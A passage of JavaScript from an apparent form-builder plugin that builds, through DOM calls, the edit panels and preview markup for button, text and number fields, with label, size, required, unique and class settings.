			el_choices_remove.style.cssText = 'cursor:pointer; vertical-align:middle; margin:3px';
			el_choices_remove.setAttribute("align", 'top');
			el_choices_remove.setAttribute("onClick", "remove_button("+j+","+i+")");
			
		td_hr.appendChild(hr);
		td_button.appendChild(el_title_label);
		td_button.appendChild(el_title);
		td_button.appendChild(br1);
		td_button.appendChild(el_func_label);
		td_button.appendChild(el_func);
		td_X.appendChild(el_choices_remove);
		edit_main_td4.appendChild(table_button);
	
	}

	edit_main_tr1.appendChild(edit_main_td1);
	edit_main_tr1.appendChild(edit_main_td1_1);
	edit_main_tr2.appendChild(edit_main_td2);
	edit_main_tr2.appendChild(edit_main_td2_1);
	edit_main_tr3.appendChild(edit_main_td3);
	edit_main_tr3.appendChild(edit_main_td3_1);
	edit_main_tr4.appendChild(edit_main_td4);
	edit_main_tr6.appendChild(edit_main_td6);
	edit_main_tr6.appendChild(edit_main_td6_1);
	edit_main_tr5.appendChild(edit_main_td5);
	edit_main_tr5.appendChild(edit_main_td5_1);

	edit_main_table.appendChild(edit_main_tr1);

	edit_main_table.appendChild(edit_main_tr3);
	edit_main_table.appendChild(edit_main_tr4);
	edit_main_table.appendChild(edit_main_tr2);
//	edit_main_table.appendChild(edit_main_tr5);
//	edit_main_table.appendChild(edit_main_tr6);

	edit_div.appendChild(edit_main_table);
	
	t.appendChild(edit_div);
	
//show table

	element='button';	type='button'; 
	var adding_type = document.createElement("input");
            adding_type.setAttribute("type", "hidden");
            adding_type.setAttribute("value", "type_button");
            adding_type.setAttribute("name", i+"_typeform_id_temp");
            adding_type.setAttribute("id", i+"_typeform_id_temp");
    var div = document.createElement('div');
       	div.setAttribute("id", "main_div");
//tbody sarqac
		
		
	var table = document.createElement('table');
		table.setAttribute("id", i+"_elemet_tableform_id_temp");
	
    var tr = document.createElement('tr');
      	var td1 = document.createElement('td');
         	td1.setAttribute("valign", 'middle');
         	td1.setAttribute("align", 'left');
           	td1.setAttribute("id", i+"_label_sectionform_id_temp");
		td1.style.cssText = 'display:none';
      	var td2 = document.createElement('td');
        	td2.setAttribute("valign", 'top');
         	td2.setAttribute("align", 'left');
           	td2.setAttribute("id", i+"_element_sectionform_id_temp");

      	var br1 = document.createElement('br');
      	var br2 = document.createElement('br');
     	var br3 = document.createElement('br');
      	var br4 = document.createElement('br');
	//	table_little -@ sarqaca tbody table_little darela table_little_t
      	var label = document.createElement('span');
			label.setAttribute("id", i+"_element_labelform_id_temp");
			label.innerHTML = "button_"+i;
			label.style.cssText = 'display:none';
	    
	n=w_title.length;
	for(j=0; j<n; j++)
	{      	
	
		var adding = document.createElement(element);
				adding.setAttribute("type", type);
				adding.setAttribute("id", i+"_elementform_id_temp"+j);
				adding.setAttribute("name", i+"_elementform_id_temp"+j);
				adding.setAttribute("value", w_title[j]);
				adding.innerHTML = w_title[j];
				adding.setAttribute("onclick", w_func[j]);
				
				
		td2.appendChild(adding);
	}			
      	var main_td  = document.getElementById('show_table');
	
      	td1.appendChild(label);
      
        td2.appendChild(adding_type);
      	tr.appendChild(td1);
      	tr.appendChild(td2);
      	table.appendChild(tr);
      

      	div.appendChild(table);
      	div.appendChild(br1);
      	main_td.appendChild(div);
change_class(w_class, i);
refresh_attr(i, 'type_checkbox');
}

function type_text(i, w_field_label, w_field_label_pos, w_size, w_first_val, w_title, w_required, w_unique, w_class, w_attr_name, w_attr_value) {

 	element_ids=[ 'option1', 'option2'];
    document.getElementById("element_type").value="type_text";
    
	delete_last_child();
// edit table	
	var edit_div  = document.createElement('div');
		edit_div.setAttribute("id", "edit_div");
		edit_div.setAttribute("style", "border-top:1px dotted black;padding:10px;  padding-top:0px; padding-bottom:0px; margin-top:10px;");
		
	var edit_main_table  = document.createElement('table');
		edit_main_table.setAttribute("id", "edit_main_table");
		edit_main_table.setAttribute("cellpadding", "0");
		edit_main_table.setAttribute("cellspacing", "0");
		edit_main_table.setAttribute("cellpadding", "0");
		edit_main_table.setAttribute("cellspacing", "0");
		
	var edit_main_tr1  = document.createElement('tr');
      		edit_main_tr1.setAttribute("valing", "top");
		
	var edit_main_tr2  = document.createElement('tr');
      		edit_main_tr2.setAttribute("valing", "top");
		
	var edit_main_tr3  = document.createElement('tr');
      		edit_main_tr3.setAttribute("valing", "top");
		
	var edit_main_tr4  = document.createElement('tr');
      		edit_main_tr4.setAttribute("valing", "top");
		
	var edit_main_tr5  = document.createElement('tr');
      		edit_main_tr5.setAttribute("valing", "top");
			
	var edit_main_tr6  = document.createElement('tr');
      		edit_main_tr6.setAttribute("valing", "top");

	var edit_main_tr7  = document.createElement('tr');
      		edit_main_tr7.setAttribute("valing", "top");
			
	var edit_main_tr8  = document.createElement('tr');
      		edit_main_tr8.setAttribute("valing", "top");

	var edit_main_tr9  = document.createElement('tr');
      		edit_main_tr9.setAttribute("valing", "top");

	var edit_main_td1 = document.createElement('td');
		edit_main_td1.style.cssText = "padding-top:10px";	
	var edit_main_td1_1 = document.createElement('td');
		edit_main_td1_1.style.cssText = "padding-top:10px";	
	var edit_main_td2 = document.createElement('td');
		edit_main_td2.style.cssText = "padding-top:10px";
	var edit_main_td2_1 = document.createElement('td');
		edit_main_td2_1.style.cssText = "padding-top:10px";

	var edit_main_td3 = document.createElement('td');
		edit_main_td3.style.cssText = "padding-top:10px";
	var edit_main_td3_1 = document.createElement('td');
		edit_main_td3_1.style.cssText = "padding-top:10px";
		
	var edit_main_td4 = document.createElement('td');
		edit_main_td4.style.cssText = "padding-top:10px";
	var edit_main_td4_1 = document.createElement('td');
		edit_main_td4_1.style.cssText = "padding-top:10px";
		
	var edit_main_td5 = document.createElement('td');
		edit_main_td5.style.cssText = "padding-top:10px";
	var edit_main_td5_1 = document.createElement('td');
		edit_main_td5_1.style.cssText = "padding-top:10px";
				
	var edit_main_td6 = document.createElement('td');
		edit_main_td6.style.cssText = "padding-top:10px";
	var edit_main_td6_1 = document.createElement('td');
		edit_main_td6_1.style.cssText = "padding-top:10px";
		
	var edit_main_td7 = document.createElement('td');
		edit_main_td7.style.cssText = "padding-top:10px";
	var edit_main_td7_1 = document.createElement('td');
		edit_main_td7_1.style.cssText = "padding-top:10px";
		  
	var edit_main_td8 = document.createElement('td');
		edit_main_td8.style.cssText = "padding-top:10px";
	var edit_main_td8_1 = document.createElement('td');
		edit_main_td8_1.style.cssText = "padding-top:10px";
		  
	var edit_main_td9 = document.createElement('td');
		edit_main_td9.style.cssText = "padding-top:10px";
	var edit_main_td9_1 = document.createElement('td');
		edit_main_td9_1.style.cssText = "padding-top:10px";
		  
	var el_label_label = document.createElement('label');
	                el_label_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
			el_label_label.innerHTML = "Field label";
	
	var el_label_textarea = document.createElement('textarea');
                el_label_textarea.setAttribute("id", "edit_for_label");
                el_label_textarea.setAttribute("rows", "4");
                el_label_textarea.style.cssText = "width:200px";
                el_label_textarea.setAttribute("onKeyUp", "change_label('"+i+"_element_labelform_id_temp', this.value)");
		el_label_textarea.innerHTML = w_field_label;
		
	var el_label_position_label = document.createElement('label');
	        el_label_position_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_label_position_label.innerHTML = "Field label position";
	
	var el_label_position1 = document.createElement('input');
                el_label_position1.setAttribute("id", "edit_for_label_position_top");
                el_label_position1.setAttribute("type", "radio");
                el_label_position1.setAttribute("value", "left");
                
		el_label_position1.setAttribute("name", "edit_for_label_position");
                el_label_position1.setAttribute("onchange", "label_left("+i+")");
	Left = document.createTextNode("Left");
		
	var el_label_position2 = document.createElement('input');

                el_label_position2.setAttribute("id", "edit_for_label_position_left");
                el_label_position2.setAttribute("type", "radio");
                el_label_position2.setAttribute("value", "top");
                el_label_position2.setAttribute("name", "edit_for_label_position");
                el_label_position2.setAttribute("onchange", "label_top("+i+")");
	Top = document.createTextNode("Top");
		
	if(w_field_label_pos=="top")
				el_label_position2.setAttribute("checked", "checked");
	else
				el_label_position1.setAttribute("checked", "checked");

	var el_size_label = document.createElement('label');
	        el_size_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_size_label.innerHTML = "Field size(px) ";
	var el_size = document.createElement('input');
		   el_size.setAttribute("id", "edit_for_input_size");
		   el_size.setAttribute("type", "text");
		   el_size.setAttribute("value", w_size);
		 	 
			el_size.setAttribute("name", "edit_for_size");
			el_size.setAttribute("onKeyPress", "return check_isnum(event)");
            el_size.setAttribute("onKeyUp", "change_w_style('"+i+"_elementform_id_temp', this.value)");

	var el_first_value_label = document.createElement('label');
	        el_first_value_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_first_value_label.innerHTML = "Value if empty ";
	
	var el_first_value_input = document.createElement('input');
                el_first_value_input.setAttribute("id", "el_first_value_input");
                el_first_value_input.setAttribute("type", "text");
                el_first_value_input.setAttribute("value", w_title);
                el_first_value_input.style.cssText = "width:200px;";
                el_first_value_input.setAttribute("onKeyUp", "change_input_value(this.value,'"+i+"_elementform_id_temp')");
	
	var el_required_label = document.createElement('label');
	        el_required_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_required_label.innerHTML = "Required";
	
	var el_required = document.createElement('input');
                el_required.setAttribute("id", "el_send");
                el_required.setAttribute("type", "checkbox");
                el_required.setAttribute("value", "yes");
                el_required.setAttribute("onclick", "set_required('"+i+"_required')");
	if(w_required=="yes")
                el_required.setAttribute("checked", "checked");
			
	
	var el_unique_label = document.createElement('label');
	    el_unique_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_unique_label.innerHTML = "Allow only unique values";
	
	var el_unique = document.createElement('input');
                el_unique.setAttribute("id", "el_send");
                el_unique.setAttribute("type", "checkbox");
                el_unique.setAttribute("value", "yes");
                el_unique.setAttribute("onclick", "set_unique('"+i+"_uniqueform_id_temp')");
	if(w_unique=="yes")
                el_unique.setAttribute("checked", "checked");
				
				
				
	var el_style_label = document.createElement('label');
	        el_style_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_style_label.innerHTML = "Deactive Class name";
	
	var el_style_textarea = document.createElement('input');
                el_style_textarea.setAttribute("id", "element_style");
				el_style_textarea.setAttribute("type", "text");
				el_style_textarea.setAttribute("value", "input_deactive");
				el_style_textarea.setAttribute("disabled", "disabled");
                el_style_textarea.style.cssText = "width:200px;";
                el_style_textarea.setAttribute("onChange", "change_class(this.value,'"+i+"')");

	var el_style_label2 = document.createElement('label');
	    el_style_label2.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_style_label2.innerHTML = "Active Class name";
	
	var el_style_textarea2 = document.createElement('input');
                el_style_textarea2.setAttribute("id", "element_style");
				el_style_textarea2.setAttribute("type", "text");
				el_style_textarea2.setAttribute("value", "input_active");
				el_style_textarea2.setAttribute("disabled", "disabled");
                el_style_textarea2.style.cssText = "width:200px;";
                el_style_textarea2.setAttribute("onChange", "change_class(this.value,'"+i+"')");

	var el_attr_label = document.createElement('label');
	                el_attr_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
			el_attr_label.innerHTML = "Additional Attributes";
			
	var el_attr_add = document.createElement('img');
                el_attr_add.setAttribute("id", "el_choices_add");
           	el_attr_add.setAttribute("src", fmc_plugin_url+'/images/add.png');
            	el_attr_add.style.cssText = 'cursor:pointer; margin-left:68px';
            	el_attr_add.setAttribute("title", 'add');
                el_attr_add.setAttribute("onClick", "add_attr("+i+", 'type_text')");
	var el_attr_table = document.createElement('table');
                el_attr_table.setAttribute("id", 'attributes');
                el_attr_table.setAttribute("border", '0');
        	el_attr_table.style.cssText = 'margin-left:0px';
	var el_attr_tr_label = document.createElement('tr');
                el_attr_tr_label.setAttribute("idi", '0');
	var el_attr_td_name_label = document.createElement('th');
            	el_attr_td_name_label.style.cssText = 'width:100px';
	var el_attr_td_value_label = document.createElement('th');
            	el_attr_td_value_label.style.cssText = 'width:100px';
	var el_attr_td_X_label = document.createElement('th');
            	el_attr_td_X_label.style.cssText = 'width:10px';
	var el_attr_name_label = document.createElement('label');
	                el_attr_name_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 11px";
			el_attr_name_label.innerHTML = "Name";
			
	var el_attr_value_label = document.createElement('label');
	                el_attr_value_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 11px";
			el_attr_value_label.innerHTML = "Value";
			
	el_attr_table.appendChild(el_attr_tr_label);
	el_attr_tr_label.appendChild(el_attr_td_name_label);
	el_attr_tr_label.appendChild(el_attr_td_value_label);
	el_attr_tr_label.appendChild(el_attr_td_X_label);
	el_attr_td_name_label.appendChild(el_attr_name_label);
	el_attr_td_value_label.appendChild(el_attr_value_label);
	
	n=w_attr_name.length;
	for(j=1; j<=n; j++)
	{	
		var el_attr_tr = document.createElement('tr');
			el_attr_tr.setAttribute("id", "attr_row_"+j);
			el_attr_tr.setAttribute("idi", j);
		var el_attr_td_name = document.createElement('td');
			el_attr_td_name.style.cssText = 'width:100px';
		var el_attr_td_value = document.createElement('td');
			el_attr_td_value.style.cssText = 'width:100px';
		
		var el_attr_td_X = document.createElement('td');
		var el_attr_name = document.createElement('input');
	
			el_attr_name.setAttribute("type", "text");
	
			el_attr_name.style.cssText = "width:100px";
			el_attr_name.setAttribute("value", w_attr_name[j-1]);
			el_attr_name.setAttribute("id", "attr_name"+j);
			el_attr_name.setAttribute("onChange", "change_attribute_name("+i+", this, 'type_text')");
			
		var el_attr_value = document.createElement('input');
	
			el_attr_value.setAttribute("type", "text");
	
			el_attr_value.style.cssText = "width:100px";
			el_attr_value.setAttribute("value", w_attr_value[j-1]);
			el_attr_value.setAttribute("id", "attr_value"+j);
			el_attr_value.setAttribute("onChange", "change_attribute_value("+i+", "+j+", 'type_text')");
	
		var el_attr_remove = document.createElement('img');
			el_attr_remove.setAttribute("id", "el_choices"+j+"_remove");
			el_attr_remove.setAttribute("src", fmc_plugin_url+'/images/delete.png');
			el_attr_remove.style.cssText = 'cursor:pointer; vertical-align:middle; margin:3px';
			el_attr_remove.setAttribute("align", 'top');
			el_attr_remove.setAttribute("onClick", "remove_attr("+j+", "+i+", 'type_text')");
		el_attr_table.appendChild(el_attr_tr);
		el_attr_tr.appendChild(el_attr_td_name);
		el_attr_tr.appendChild(el_attr_td_value);
		el_attr_tr.appendChild(el_attr_td_X);
		el_attr_td_name.appendChild(el_attr_name);
		el_attr_td_value.appendChild(el_attr_value);
		el_attr_td_X.appendChild(el_attr_remove);
		
	}

		
	var t  = document.getElementById('edit_table');
	
	var br = document.createElement('br');
	var br1 = document.createElement('br');
	var br2 = document.createElement('br');
	var br3 = document.createElement('br');
	var br4 = document.createElement('br');
	var br5 = document.createElement('br');
	var br6 = document.createElement('br');
	edit_main_td1.appendChild(el_label_label);
	edit_main_td1_1.appendChild(el_label_textarea);

	edit_main_td2.appendChild(el_label_position_label);
	edit_main_td2.appendChild(br1);
	edit_main_td2_1.appendChild(el_label_position1);
	edit_main_td2_1.appendChild(Left);
	edit_main_td2_1.appendChild(br2);
	edit_main_td2_1.appendChild(el_label_position2);
	edit_main_td2_1.appendChild(Top);
	
	edit_main_td3.appendChild(el_size_label);
	edit_main_td3_1.appendChild(el_size);
	
	edit_main_td4.appendChild(el_first_value_label);
	edit_main_td4_1.appendChild(el_first_value_input);
	
	edit_main_td5.appendChild(el_style_label);
	edit_main_td5_1.appendChild(el_style_textarea);
	
	edit_main_td9.appendChild(el_style_label2);
	edit_main_td9_1.appendChild(el_style_textarea2);
	
	
	
	
	edit_main_td6.appendChild(el_required_label);
	edit_main_td6_1.appendChild(el_required);
	edit_main_td8.appendChild(el_unique_label);
	edit_main_td8_1.appendChild(el_unique);
	
	edit_main_td7.appendChild(el_attr_label);
	edit_main_td7.appendChild(el_attr_add);
	edit_main_td7.appendChild(br6);
	edit_main_td7.appendChild(el_attr_table);
	edit_main_td7.setAttribute("colspan", "2");

	edit_main_tr1.appendChild(edit_main_td1);
	edit_main_tr1.appendChild(edit_main_td1_1);
	edit_main_tr2.appendChild(edit_main_td2);
	edit_main_tr2.appendChild(edit_main_td2_1);
	edit_main_tr3.appendChild(edit_main_td3);
	edit_main_tr3.appendChild(edit_main_td3_1);
	edit_main_tr4.appendChild(edit_main_td4);
	edit_main_tr4.appendChild(edit_main_td4_1);
	edit_main_tr5.appendChild(edit_main_td5);
	edit_main_tr5.appendChild(edit_main_td5_1);
	edit_main_tr6.appendChild(edit_main_td6);
	edit_main_tr6.appendChild(edit_main_td6_1);
	edit_main_tr8.appendChild(edit_main_td8);
	edit_main_tr8.appendChild(edit_main_td8_1);
	edit_main_tr7.appendChild(edit_main_td7);
	edit_main_tr9.appendChild(edit_main_td9);
	edit_main_tr9.appendChild(edit_main_td9_1);
	edit_main_table.appendChild(edit_main_tr1);
	edit_main_table.appendChild(edit_main_tr2);
	edit_main_table.appendChild(edit_main_tr3);
	edit_main_table.appendChild(edit_main_tr4);
	edit_main_table.appendChild(edit_main_tr5);
	edit_main_table.appendChild(edit_main_tr9);
	edit_main_table.appendChild(edit_main_tr6);
	edit_main_table.appendChild(edit_main_tr8);
	edit_main_table.appendChild(edit_main_tr7);
	edit_div.appendChild(edit_main_table);
	
	t.appendChild(edit_div);
	add_id_and_name(i, 'type_text');
	
//show table

	element='input';	type='text'; 
	var adding_type = document.createElement("input");
            adding_type.setAttribute("type", "hidden");
            adding_type.setAttribute("value", "type_text");
            adding_type.setAttribute("name", i+"_typeform_id_temp");
            adding_type.setAttribute("id", i+"_typeform_id_temp");
	    
	var adding_required= document.createElement("input");
            adding_required.setAttribute("type", "hidden");
            adding_required.setAttribute("value", w_required);
            adding_required.setAttribute("name", i+"_requiredform_id_temp");
            adding_required.setAttribute("id", i+"_requiredform_id_temp");
			
	var adding_unique= document.createElement("input");
            adding_unique.setAttribute("type", "hidden");
            adding_unique.setAttribute("value", w_unique);
            adding_unique.setAttribute("name", i+"_uniqueform_id_temp");
            adding_unique.setAttribute("id", i+"_uniqueform_id_temp");
			
	var adding = document.createElement(element);
            adding.setAttribute("type", type);
		
		if(w_title==w_first_val)
		{
			adding.style.cssText = "width:"+w_size+"px;";
			adding.setAttribute("class", "input_deactive");
		}
		else
		{
			adding.style.cssText = "width:"+w_size+"px;";
			adding.setAttribute("class", "input_active");
		}
			adding.setAttribute("id", i+"_elementform_id_temp");
			adding.setAttribute("name", i+"_elementform_id_temp");
			adding.setAttribute("value", w_first_val);
			adding.setAttribute("title", w_title);
			adding.setAttribute("onFocus", 'delete_value("'+i+'_elementform_id_temp")');
			adding.setAttribute("onBlur", 'return_value("'+i+'_elementform_id_temp")');
			adding.setAttribute("onChange", 'change_value("'+i+'_elementform_id_temp")');
			
	 
     	var div = document.createElement('div');
      	    div.setAttribute("id", "main_div");
					
      	var table = document.createElement('table');
           	table.setAttribute("id", i+"_elemet_tableform_id_temp");
			
      	var tr = document.createElement('tr');
			
      	var td1 = document.createElement('td');
         	td1.setAttribute("valign", 'middle');
         	td1.setAttribute("align", 'left');
           	td1.setAttribute("id", i+"_label_sectionform_id_temp");
			
      	var td2 = document.createElement('td');
        	td2.setAttribute("valign", 'middle');
         	td2.setAttribute("align", 'left');
           	td2.setAttribute("id", i+"_element_sectionform_id_temp");
			
      	var br1 = document.createElement('br');
      	var br2 = document.createElement('br');
     	var br3 = document.createElement('br');
      	var br4 = document.createElement('br');
      

	    
      	var label = document.createElement('span');
			label.setAttribute("id", i+"_element_labelform_id_temp");
			label.innerHTML = w_field_label;
			label.setAttribute("class", "label");
	    
      	var required = document.createElement('span');
			required.setAttribute("id", i+"_required_elementform_id_temp");
			required.innerHTML = "";
			required.setAttribute("class", "required");
	if(w_required=="yes")
			required.innerHTML = " *";
      	var main_td  = document.getElementById('show_table');
      
      	td1.appendChild(label);
      	td1.appendChild(required);
      	td2.appendChild(adding_type);
      	td2.appendChild(adding_required);
      	td2.appendChild(adding_unique);
      	td2.appendChild(adding);
      	tr.appendChild(td1);
      	tr.appendChild(td2);
      	table.appendChild(tr);
      
      	div.appendChild(table);
      	div.appendChild(br3);
      	main_td.appendChild(div);
	if(w_field_label_pos=="top")
				label_top(i);
change_class(w_class, i);
refresh_attr(i, 'type_text');
}

function type_number(i, w_field_label, w_field_label_pos, w_size, w_first_val, w_title, w_required, w_unique, w_class, w_attr_name, w_attr_value) {

 	element_ids=[ 'option1', 'option2'];
    document.getElementById("element_type").value="type_number";
    
	delete_last_child();
// edit table	
	var edit_div  = document.createElement('div');
		edit_div.setAttribute("id", "edit_div");
		edit_div.setAttribute("style", "border-top:1px dotted black;padding:10px;  padding-top:0px; padding-bottom:0px; margin-top:10px;");
		
	var edit_main_table  = document.createElement('table');
		edit_main_table.setAttribute("id", "edit_main_table");
		edit_main_table.setAttribute("cellpadding", "0");
		edit_main_table.setAttribute("cellspacing", "0");
		
	var edit_main_tr1  = document.createElement('tr');
      		edit_main_tr1.setAttribute("valing", "top");
		
	var edit_main_tr2  = document.createElement('tr');
      		edit_main_tr2.setAttribute("valing", "top");
		
	var edit_main_tr3  = document.createElement('tr');
      		edit_main_tr3.setAttribute("valing", "top");
		
	var edit_main_tr4  = document.createElement('tr');
      		edit_main_tr4.setAttribute("valing", "top");
		
	var edit_main_tr5  = document.createElement('tr');
      		edit_main_tr5.setAttribute("valing", "top");
			
	var edit_main_tr6  = document.createElement('tr');
      		edit_main_tr6.setAttribute("valing", "top");

	var edit_main_tr7  = document.createElement('tr');
      		edit_main_tr7.setAttribute("valing", "top");

	var edit_main_tr8  = document.createElement('tr');
      		edit_main_tr8.setAttribute("valing", "top");

	var edit_main_td1 = document.createElement('td');
		edit_main_td1.style.cssText = "padding-top:10px";	
	var edit_main_td1_1 = document.createElement('td');
		edit_main_td1_1.style.cssText = "padding-top:10px";	
	var edit_main_td2 = document.createElement('td');
		edit_main_td2.style.cssText = "padding-top:10px";
	var edit_main_td2_1 = document.createElement('td');
		edit_main_td2_1.style.cssText = "padding-top:10px";

	var edit_main_td3 = document.createElement('td');
		edit_main_td3.style.cssText = "padding-top:10px";
	var edit_main_td3_1 = document.createElement('td');
		edit_main_td3_1.style.cssText = "padding-top:10px";
	var edit_main_td4 = document.createElement('td');
		edit_main_td4.style.cssText = "padding-top:10px";
	var edit_main_td4_1 = document.createElement('td');
		edit_main_td4_1.style.cssText = "padding-top:10px";
		
	var edit_main_td5 = document.createElement('td');
		edit_main_td5.style.cssText = "padding-top:10px";
	var edit_main_td5_1 = document.createElement('td');
		edit_main_td5_1.style.cssText = "padding-top:10px";
				
	var edit_main_td6 = document.createElement('td');
		edit_main_td6.style.cssText = "padding-top:10px";
	var edit_main_td6_1 = document.createElement('td');
		edit_main_td6_1.style.cssText = "padding-top:10px";
		
	var edit_main_td7 = document.createElement('td');
		edit_main_td7.style.cssText = "padding-top:10px";
	var edit_main_td7_1 = document.createElement('td');
		edit_main_td7_1.style.cssText = "padding-top:10px";
		  
	var edit_main_td8 = document.createElement('td');
		edit_main_td8.style.cssText = "padding-top:10px";
	var edit_main_td8_1 = document.createElement('td');
		edit_main_td8_1.style.cssText = "padding-top:10px";
		  
	var el_label_label = document.createElement('label');
	        el_label_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
			el_label_label.innerHTML = "Field label";
	
	var el_label_textarea = document.createElement('textarea');
                el_label_textarea.setAttribute("id", "edit_for_label");
                el_label_textarea.setAttribute("rows", "4");
                el_label_textarea.style.cssText = "width:200px";
                el_label_textarea.setAttribute("onKeyUp", "change_label('"+i+"_element_labelform_id_temp', this.value)");
		el_label_textarea.innerHTML = w_field_label;
		
	var el_label_position_label = document.createElement('label');
	        el_label_position_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_label_position_label.innerHTML = "Field label position";
	
	var el_label_position1 = document.createElement('input');
                el_label_position1.setAttribute("id", "edit_for_label_position_top");
                el_label_position1.setAttribute("type", "radio");
                el_label_position1.setAttribute("value", "left");
                
				el_label_position1.setAttribute("name", "edit_for_label_position");
                el_label_position1.setAttribute("onchange", "label_left("+i+")");
	Left = document.createTextNode("Left");
		
	var el_label_position2 = document.createElement('input');

                el_label_position2.setAttribute("id", "edit_for_label_position_left");
                el_label_position2.setAttribute("type", "radio");
                el_label_position2.setAttribute("value", "top");
		
                el_label_position2.setAttribute("name", "edit_for_label_position");
                el_label_position2.setAttribute("onchange", "label_top("+i+")");
	Top = document.createTextNode("Top");
		
	if(w_field_label_pos=="top")
				el_label_position2.setAttribute("checked", "checked");
	else
				el_label_position1.setAttribute("checked", "checked");

	var el_size_label = document.createElement('label');
	        el_size_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_size_label.innerHTML = "Field size(px) ";
	var el_size = document.createElement('input');
		   el_size.setAttribute("id", "edit_for_input_size");
		   el_size.setAttribute("type", "text");
		   el_size.setAttribute("value", w_size);
		   
			el_size.setAttribute("name", "edit_for_size");
			el_size.setAttribute("onKeyPress", "return check_isnum_point(event)");
            el_size.setAttribute("onKeyUp", "change_w_style('"+i+"_elementform_id_temp', this.value)");

	var el_first_value_label = document.createElement('label');
	        el_first_value_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_first_value_label.innerHTML = "Value if empty ";
	
	var el_first_value_input = document.createElement('input');
                el_first_value_input.setAttribute("id", "el_first_value_input");
                el_first_value_input.setAttribute("type", "text");
                el_first_value_input.setAttribute("value", w_title);
                el_first_value_input.style.cssText = "width:200px;";
                el_first_value_input.setAttribute("onKeyUp", "change_input_value(this.value,'"+i+"_elementform_id_temp')");
	var el_required_label = document.createElement('label');
	        el_required_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_required_label.innerHTML = "Required";
	
	var el_required = document.createElement('input');
                el_required.setAttribute("id", "el_send");
                el_required.setAttribute("type", "checkbox");
                el_required.setAttribute("value", "yes");
                el_required.setAttribute("onclick", "set_required('"+i+"_required')");
	if(w_required=="yes")
                el_required.setAttribute("checked", "checked");
	
	var el_unique_label = document.createElement('label');
	    el_unique_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_unique_label.innerHTML = "Allow only unique values";
	
	var el_unique = document.createElement('input');
                el_unique.setAttribute("id", "el_send");
                el_unique.setAttribute("type", "checkbox");
                el_unique.setAttribute("value", "yes");
                el_unique.setAttribute("onclick", "set_unique('"+i+"_uniqueform_id_temp')");
	if(w_unique=="yes")
                el_unique.setAttribute("checked", "checked");
							
	var el_style_label = document.createElement('label');
	    el_style_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_style_label.innerHTML = "Class name";
	
	var el_style_textarea = document.createElement('input');
                el_style_textarea.setAttribute("id", "element_style");
		el_style_textarea.setAttribute("type", "text");
		el_style_textarea.setAttribute("value", w_class);
                el_style_textarea.style.cssText = "width:200px;";
                el_style_textarea.setAttribute("onChange", "change_class(this.value,'"+i+"')");

	var el_attr_label = document.createElement('label');
	                el_attr_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
			el_attr_label.innerHTML = "Additional Attributes";
			
	var el_attr_add = document.createElement('img');
                el_attr_add.setAttribute("id", "el_choices_add");
           	el_attr_add.setAttribute("src", fmc_plugin_url+'/images/add.png');
            	el_attr_add.style.cssText = 'cursor:pointer; margin-left:68px';
            	el_attr_add.setAttribute("title", 'add');
                el_attr_add.setAttribute("onClick", "add_attr("+i+", 'type_text')");
	var el_attr_table = document.createElement('table');
                el_attr_table.setAttribute("id", 'attributes');
                el_attr_table.setAttribute("border", '0');
        	el_attr_table.style.cssText = 'margin-left:0px';
	var el_attr_tr_label = document.createElement('tr');
                el_attr_tr_label.setAttribute("idi", '0');
	var el_attr_td_name_label = document.createElement('th');
            	el_attr_td_name_label.style.cssText = 'width:100px';
	var el_attr_td_value_label = document.createElement('th');
            	el_attr_td_value_label.style.cssText = 'width:100px';
	var el_attr_td_X_label = document.createElement('th');
            	el_attr_td_X_label.style.cssText = 'width:10px';
	var el_attr_name_label = document.createElement('label');
	                el_attr_name_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 11px";
			el_attr_name_label.innerHTML = "Name";
			
	var el_attr_value_label = document.createElement('label');
	                el_attr_value_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 11px";
			el_attr_value_label.innerHTML = "Value";
			
	el_attr_table.appendChild(el_attr_tr_label);
	el_attr_tr_label.appendChild(el_attr_td_name_label);
	el_attr_tr_label.appendChild(el_attr_td_value_label);
	el_attr_tr_label.appendChild(el_attr_td_X_label);
	el_attr_td_name_label.appendChild(el_attr_name_label);
	el_attr_td_value_label.appendChild(el_attr_value_label);
	
	n=w_attr_name.length;
	for(j=1; j<=n; j++)
	{	
		var el_attr_tr = document.createElement('tr');
			el_attr_tr.setAttribute("id", "attr_row_"+j);
			el_attr_tr.setAttribute("idi", j);
		var el_attr_td_name = document.createElement('td');
			el_attr_td_name.style.cssText = 'width:100px';
		var el_attr_td_value = document.createElement('td');
			el_attr_td_value.style.cssText = 'width:100px';
		
		var el_attr_td_X = document.createElement('td');
		var el_attr_name = document.createElement('input');
	
			el_attr_name.setAttribute("type", "text");
	
			el_attr_name.style.cssText = "width:100px";
			el_attr_name.setAttribute("value", w_attr_name[j-1]);
			el_attr_name.setAttribute("id", "attr_name"+j);
			el_attr_name.setAttribute("onChange", "change_attribute_name("+i+", this, 'type_text')");
			
		var el_attr_value = document.createElement('input');
	
			el_attr_value.setAttribute("type", "text");
	
			el_attr_value.style.cssText = "width:100px";
			el_attr_value.setAttribute("value", w_attr_value[j-1]);
			el_attr_value.setAttribute("id", "attr_value"+j);
			el_attr_value.setAttribute("onChange", "change_attribute_value("+i+", "+j+", 'type_text')");
	
		var el_attr_remove = document.createElement('img');
			el_attr_remove.setAttribute("id", "el_choices"+j+"_remove");
